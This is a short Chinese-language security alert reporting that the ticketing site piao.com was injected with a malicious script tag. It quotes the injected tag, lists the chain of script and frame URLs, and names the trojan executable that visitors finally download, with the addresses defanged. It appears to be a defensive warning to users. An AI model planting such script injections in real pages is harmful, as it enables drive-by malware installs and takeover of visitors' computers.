中国票务网被植入恶意代码
中国票务网(htxxp://www.piao.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:htxxp://www.piao.com/c_lvyou/index.asp
网页被嵌入恶意链接代码:
<script src=htxxp://3b3.org/c.js></script>
挂马分析:
[wide]htxxp://www.piao.com/c_lvyou/index.asp
[script]htxxp://3b3.org/c.js
[frame]htxxp://vpsvip.com/aa/a100.htm
[frame]htxxp://vpsvip.com/aa/index.htm
[frame]htxxp://vpsvip.com/aa/flash.htm
[frame]htxxp://vpsvip.com/aa/a44.htm
[frame]htxxp://vpsvip.com/aa/office.htm
[frame]htxxp://vpsvip.com/aa/02.htm
[script]htxxp://js.tongji.cn.yahoo.com/1083501/ystat.js
[script]htxxp://s31.cnzz.com/stat.php?id=1408284&web_id=1408284
[script]htxxp://js.tongji.linezing.com/1136402/tongji.js
最终下载病毒文件:
htxxp://milllk.com/wm/svchost.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
该网站历史挂马次数:16
Google对该网站的判定:安全
知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:htxxp://www.cert.org.cn/
关键字:恶意代码中国票务
